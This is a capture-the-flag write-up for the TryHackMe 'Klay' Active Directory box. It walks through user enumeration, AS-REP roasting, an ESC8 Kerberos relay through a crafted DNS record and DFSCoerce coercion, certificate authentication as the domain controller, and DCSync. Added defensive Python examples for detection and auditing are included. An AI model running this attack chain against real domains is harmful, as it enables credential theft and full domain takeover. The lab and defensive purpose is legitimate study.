---
# System prepended metadata

title: 'THM Industrial CTF Klay box writeup '
tags: [industrial, tryhackme, klay, boot2root, CTF, machine]

---

THM Industrial CTF Klay writeup
===


## Table of Contents

[TOC]

# In the name of God, the Most Gracious, the Most Merciful


<br>

## Description
NullRook finds a server that appears hardened, and there is no clear way of compromising it. But enumeration is key, and knowing your environment is a sure way to guarantee victory. ZeroTrace reminded NR to relay whatever information is found back to base once the target has been taken down.

> This implies that a lot of enumeration is needed and that relaying is involved.
> Also, the challenge name (klay) hints at "kerb relay".


## Recon

```java!

─$ nmap -Pn -sCV 10.10.225.160                                                                                   
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 20:31:55Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-29T20:32:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after:  2026-05-10T02:29:37
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after:  2026-05-10T02:29:37
|_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-29T20:32:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after:  2026-05-10T02:29:37
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after:  2026-05-10T02:29:37
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: KLAY
|   NetBIOS_Domain_Name: KLAY
|   NetBIOS_Computer_Name: KLAYCOMPUTER
|   DNS_Domain_Name: klay.thm
|   DNS_Computer_Name: KlayComputer.klay.thm
|   DNS_Tree_Name: klay.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2025-06-29T20:32:36+00:00
|_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Not valid before: 2025-05-09T01:38:50
|_Not valid after:  2025-11-08T01:38:50
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: KLAYCOMPUTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-29T20:32:37
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

```

> Usual AD ports

```
klay.thm
klaycomputer.klay.thm
```
> Add these to /etc/hosts with the target IP

## Finding creds

+ Anonymous access is blocked and the guest account is disabled
+ There is no website or other service that leaks usernames, so we brute-force them with kerbrute


```java!
─$ kerbrute userenum  --dc KLAYCOMPUTER.klay.thm -d klay.thm /usr/share/seclists/Usernames/Names/names.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/29/25 - Ronnie Flathers @ropnop

2025/06/29 16:36:09 >  Using KDC(s):
2025/06/29 16:36:09 >   KLAYCOMPUTER.klay.thm:88

2025/06/29 16:36:13 >  [+] VALID USERNAME:       andie@klay.thm
2025/06/29 16:36:14 >  [+] VALID USERNAME:       ardavan@klay.thm
2025/06/29 16:36:16 >  [+] VALID USERNAME:       audrye@klay.thm
2025/06/29 16:36:16 >  [+] VALID USERNAME:       aurlie@klay.thm
2025/06/29 16:36:18 >  [+] VALID USERNAME:       berti@klay.thm
2025/06/29 16:36:20 >  [+] VALID USERNAME:       blanche@klay.thm
2025/06/29 16:36:20 >  [+] VALID USERNAME:       bloom@klay.thm
2025/06/29 16:36:21 >  [+] VALID USERNAME:       brock@klay.thm
...
```

> Through kerbrute we find around 50 users

+ The next step is to authenticate, so we need a password for one of the users; AS-REP roasting is the key to this

```javascript!
└─$ impacket-GetNPUsers klay.thm/ -usersfile users.txt -no-pass 


[-] User kristian doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User laurene doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User leesa doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ling-zhong doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User loan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lyssa doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User missie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nguyet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User norris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User patch doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User perle doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$pieter@KLAY.THM:888417f597c63244752f922e8e575d11$0fa38b2ea58ab0ef600f03f06f44efa6a73f9ce06905c89b936e3adb7965d0c8f259fd806704c9235d840b30ec79d406a304de0b7b70c383dd864046e3f03c5d1976b4ce4db8bfdb1ef0121587dda5ffbf846f8c9996d2fd1ad6e52f1aa22a6fe9cb45032de0f1b1217f46d38672357d8f8501becb29745524d6ff8e464f2281f796946ce5c09c61f50cd77410191da5fc058cb05fe966d0270e80f850cf73fd4238a5689591464c714be47e97bb540fdc2e81dff990d6bafb0b044e9b2a822e73fd30bf8771bae98b00117268e1769c309ecccffa4630ab4a74e39f0e2999d57cdbdd5b
[-] User quintilla doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rainer doesn't ha
```
> User pieter does not require Kerberos pre-authentication, so let's try cracking his AS-REP hash

![image](https://hackmd.io/_uploads/SkzPSXyrle.png)


> Note that the password contains the word "relay"
> Also, user pieter has write permission over a user called "svc_ca". This account was initially disabled; we can enable it and set its password, but that serves no purpose here
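The finding above is worth checking from the other side as well. Below is an added example (not part of the original writeup, and not impacket's code) showing how a defender audits the same weakness: the LDAP filter that lists enabled accounts with "Do not require Kerberos preauthentication" set, the same userAccountControl logic applied to a constructed directory excerpt, and a scan of constructed Security event 4768 records for TGT requests that skipped pre-authentication (Pre-Authentication Type 0), which is what an AS-REP roast looks like on the DC. Etype 0x17 (RC4) matches the `$krb5asrep$23$` hash captured above and is the cheap-to-crack case. The user records, the IPs and the account `svc_old` are constructed.

```python
"""Audit and detect AS-REP roastable accounts (added example, not the page's tooling)."""

# userAccountControl bits (standard Active Directory values)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"  # bitwise-AND extensible match


def asrep_ldap_filter():
    """LDAP filter a defender runs against the DC: pre-auth not required AND not disabled."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_DONT_REQUIRE_PREAUTH})"
            f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_ACCOUNTDISABLE})))")


# Constructed directory excerpt: sAMAccountName -> userAccountControl.
# Only pieter's roastability is confirmed by the writeup; the flag values are illustrative.
USERS = {
    "pieter": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH,
    "svc_old": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,  # disabled: KDC answers KDC_ERR_CLIENT_REVOKED
    "kristian": UF_NORMAL_ACCOUNT,
}


def roastable_accounts(users):
    """Same logic as the LDAP filter, applied to an in-memory snapshot."""
    return sorted(name for name, uac in users.items()
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)


# Constructed Security event 4768 records with the fields the event exposes.
EVENTS_4768 = [
    {"TargetUserName": "pieter", "IpAddress": "10.0.0.99", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "kristian", "IpAddress": "10.10.225.50", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"TargetUserName": "laurene", "IpAddress": "10.10.225.51", "PreAuthType": "2", "TicketEncryptionType": "0x17"},
]


def asrep_roast_alerts(events):
    """Flag TGT requests issued without pre-authentication (PreAuthType 0).

    RC4 (0x17) AS-REPs are the ones that crack quickly offline, so they rank high;
    AES ones are still worth a look but are far more expensive for the attacker.
    """
    alerts = []
    for ev in events:
        if ev.get("PreAuthType") != "0":
            continue
        severity = "high" if ev.get("TicketEncryptionType") == "0x17" else "medium"
        alerts.append((ev["TargetUserName"], ev["IpAddress"], severity))
    return alerts


if __name__ == "__main__":
    print(asrep_ldap_filter())
    print("roastable:", roastable_accounts(USERS))
    for user, src, sev in asrep_roast_alerts(EVENTS_4768):
        print(f"[{sev}] AS-REQ without pre-auth for {user} from {src}")
```

The disabled account is the edge case worth remembering: GetNPUsers skips it because the KDC refuses the AS-REQ outright, so enabling such an account (as the writeup notes is possible for svc_ca) is what would make it roastable. The remediation is to clear the pre-authentication flag and rotate the password; where the flag must stay, an AES-only key (no RC4) at least removes the cheap crack.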

## Port 80

+ This is the Microsoft Active Directory Certificate Services web enrollment page, where certificates can be requested
+ Our current user has no access to the machine, and requesting a certificate for him to authenticate with also doesn't work


+ Running certipy on the target reveals that it's vulnerable to [ESC8](https://www.crowe.com/cybersecurity-watch/exploiting-ad-cs-a-quick-look-at-esc1-esc8)

```java!
$ certipy find -u pieter@klay.thm -p 'relayboy22!' -target klay.thm  -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: klay.thm.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: KlayComputer.klay.thm.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'klay-KLAYCOMPUTER-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'klay-KLAYCOMPUTER-CA'
[*] Checking web enrollment for CA 'klay-KLAYCOMPUTER-CA' @ 'KlayComputer.klay.thm'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : klay-KLAYCOMPUTER-CA
    DNS Name                            : KlayComputer.klay.thm
    Certificate Subject                 : CN=klay-KLAYCOMPUTER-CA, DC=klay, DC=thm
    Certificate Serial Number           : 498DCBE91B891FAA44DA223858928F1E
    Certificate Validity Start          : 2025-05-10 02:26:38+00:00
    Certificate Validity End            : 2075-05-10 02:36:38+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : KLAY.THM\Administrators
      Access Rights
        ManageCa                        : KLAY.THM\Administrators
                                          KLAY.THM\Domain Admins
                                          KLAY.THM\Enterprise Admins
        ManageCertificates              : KLAY.THM\Administrators
                                          KLAY.THM\Domain Admins
                                          KLAY.THM\Enterprise Admins
        Enroll                          : KLAY.THM\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled over HTTP.
Certificate Templates                   : [!] Could not find any certificate templates

```
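The ESC8 line in that report comes down to one configuration fact: the CA's web enrollment answers over plain HTTP. The following added example (not certipy's own code) parses a report in the indented `Key : Value` layout certipy prints, extracts the web enrollment settings per CA, and flags the ESC8 condition; it then re-runs the check on the same CA with enrollment moved to HTTPS only, which is the fix. The report text is constructed after the output above, and the parser does not handle the multi-line continuation values under "Access Rights".

```python
"""Flag ESC8 (HTTP web enrollment) from a certipy-style text report. Added example."""

# Constructed excerpt in certipy's report layout; values mirror the enumeration above.
SAMPLE_REPORT = """\
Certificate Authorities
  0
    CA Name                             : klay-KLAYCOMPUTER-CA
    DNS Name                            : KlayComputer.klay.thm
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
"""

# The same CA after the fix: HTTP enrollment off, HTTPS on (True/False swapped on the two Enabled lines).
HARDENED_REPORT = (SAMPLE_REPORT.replace(": True", ": TMP")
                                .replace(": False", ": True")
                                .replace(": TMP", ": False"))


def parse_ca_report(text):
    """Turn the indented report into nested dicts.

    A line without ':' opens a section; deeper indentation nests under the
    most recent shallower section. Continuation lines of multi-valued
    fields (e.g. extra principals under ManageCa) are not modelled here.
    """
    root = {}
    stack = [(-1, root)]                      # (indent, container)
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        line = raw.strip()
        while stack[-1][0] >= indent:         # climb out to the enclosing section
            stack.pop()
        container = stack[-1][1]
        if ":" in line:
            key, value = (part.strip() for part in line.split(":", 1))
            container[key] = value
        else:
            container[line] = {}
            stack.append((indent, container[line]))
    return root


def assess_esc8(report):
    """Return {ca_name: [findings]} for every CA in the parsed report."""
    out = {}
    for ca in report.get("Certificate Authorities", {}).values():
        web = ca.get("Web Enrollment", {})
        http_on = web.get("HTTP", {}).get("Enabled") == "True"
        https_on = web.get("HTTPS", {}).get("Enabled") == "True"
        findings = []
        if http_on:
            findings.append("ESC8: web enrollment reachable over plain HTTP; "
                            "relayed authentication can obtain a certificate")
        if http_on and not https_on:
            findings.append("no HTTPS listener: enrollment requests travel in cleartext")
        out[ca.get("CA Name", "?")] = findings
    return out


def esc8_vulnerable(text):
    """True when any CA in the report carries an ESC8 finding."""
    return any(any(f.startswith("ESC8") for f in fs)
               for fs in assess_esc8(parse_ca_report(text)).values())


if __name__ == "__main__":
    for label, text in (("current", SAMPLE_REPORT), ("hardened", HARDENED_REPORT)):
        for ca, findings in assess_esc8(parse_ca_report(text)).items():
            print(f"{label}: {ca} -> {findings or ['no ESC8 finding']}")
```

Turning off the HTTP binding is only half of the fix: the HTTPS enrollment site also needs Extended Protection for Authentication (channel binding) enabled on the certsrv application, otherwise an attacker who can relay a Kerberos or NTLM authentication to the HTTPS endpoint is still in business.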

+ Normally ESC8 is exploited with an NTLM relay, but in our case that doesn't work (see below)

![image](https://hackmd.io/_uploads/H19-v71rex.png)


+ Our second approach is Kerberos relay instead of NTLM. This requires adding a DNS record that points to our Kali machine, then coercing the DC into authenticating to us
+ Next we capture the DC's Kerberos authentication and relay it to the AD CS web enrollment endpoint


# krbrelay
### 1. Add dnsRecord

```java!
-$ bloodyAD --host klaycomputer.klay.thm -u 'pieter' -p 'relayboy22!' -k -d 'klay.thm' add dnsRecord 'KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <attacker_ip> 

[+] KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
```
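That record name is the whole trick: the base64-looking suffix is a marshaled target-info blob that the Windows SMB client strips before it builds the SPN, so the DC asks the KDC for a ticket for its own `cifs/KlayComputer` service while the connection actually goes to the address in the record. Because authenticated users can create records in AD-integrated DNS zones by default, an ordinary domain account like pieter is enough to add it. The following added example (not bloodyAD's or krbrelayx's code) shows a zone-audit check a defender can run over a DNS snapshot: it matches names that shadow a real host with such a suffix and reports whether the record resolves somewhere other than the host it imitates. The zone contents are constructed, the attacker address is a placeholder, and the `1UWhRC` marker is taken from the record created above and assumed to be the fixed start of the blob.

```python
"""Spot AD DNS records carrying a marshaled target-info suffix (added example)."""
import re

# Assumption: the blob appended to the host name starts with the '1UWhRC'
# marker seen in this writeup's record and continues with base64 characters.
MARSHALED_NAME = re.compile(r"^(?P<host>[A-Za-z0-9-]+?)(?P<blob>1UWhRC[A-Za-z0-9+/=]{16,})$")

# Constructed zone snapshot: (record name, type, data). 10.0.0.99 is a placeholder.
ZONE = [
    ("KlayComputer", "A", "10.10.225.160"),
    ("KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA", "A", "10.0.0.99"),
    ("fileserver", "A", "10.10.225.161"),
]


def find_marshaled_records(zone):
    """Return one finding per record whose name is a real host plus a marshaled suffix."""
    # Map of ordinary A records, used to see which host a suspicious name shadows.
    legit = {name.lower(): data for name, rtype, data in zone
             if rtype == "A" and not MARSHALED_NAME.match(name)}
    findings = []
    for name, rtype, data in zone:
        m = MARSHALED_NAME.match(name)
        if not m:
            continue
        host = m.group("host")
        legit_ip = legit.get(host.lower())
        findings.append({
            "record": name,
            "type": rtype,
            "shadowed_host": host,
            "record_ip": data,
            "legit_ip": legit_ip,
            "ip_mismatch": legit_ip != data,   # points somewhere other than the real host
        })
    return findings


if __name__ == "__main__":
    for f in find_marshaled_records(ZONE):
        flag = "REDIRECTED" if f["ip_mismatch"] else "same address"
        print(f"{f['record']} shadows {f['shadowed_host']} "
              f"({f['legit_ip']}) -> {f['record_ip']} [{flag}]")
```

The snapshot can come from an LDAP export of the zone's `dnsNode` objects or from a zone transfer on a DNS server you administer. The matching mitigations are to stop unprivileged accounts from creating records in the zone and to alert on new `dnsNode` objects created by principals outside the DNS admin group.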

### 2. Run krbrelay

```java!
└─$ python /opt/opt/krbrelayx/krbrelayx.py -t 'http://KLAYCOMPUTER.klay.thm/certsrv/certfnsh.asp' --adcs --template DomainController -v 'KLAYCOMPUTER$'  
```

### 3. Coerce and force the DC to authenticate to us

+ In another terminal, while krbrelayx is listening, run this command:
```java

$ nxc smb klay.thm -u pieter -p relayboy22\! -M coerce_plus -o LISTENER=KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 
SMB         10.10.225.160   445    KLAYCOMPUTER     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KLAYCOMPUTER) (domain:klay.thm) (signing:True) (SMBv1:False)
SMB         10.10.225.160   445    KLAYCOMPUTER     [+] klay.thm\pieter:relayboy22! 
COERCE_PLUS 10.10.225.160   445    KLAYCOMPUTER     VULNERABLE, DFSCoerce

```

+ The output in the krbrelayx terminal:
![image](https://hackmd.io/_uploads/rJSm5Q1Slg.png)


> Nice, now we can use this PFX file to authenticate as the DC account and perform DCSync to dump the users' hashes


```java!
-$ certipy auth -pfx KLAYCOMPUTER\$.pfx -domain klay.thm -dc-ip 10.10.225.160

```

![image](https://hackmd.io/_uploads/S1sS9mJrxx.png)



# DCSync

![image](https://hackmd.io/_uploads/rk4YiQJHgl.png)


+ Now all that is left is to use the administrator NTLM hash to log in and grab the flag


![image](https://hackmd.io/_uploads/Skxrs7JSgg.png)


+ Thank you for reading


# Credits
+ Team: Toasters
+ ʎɐsǝǝu [HackTheBox](https://app.hackthebox.com/profile/1725001)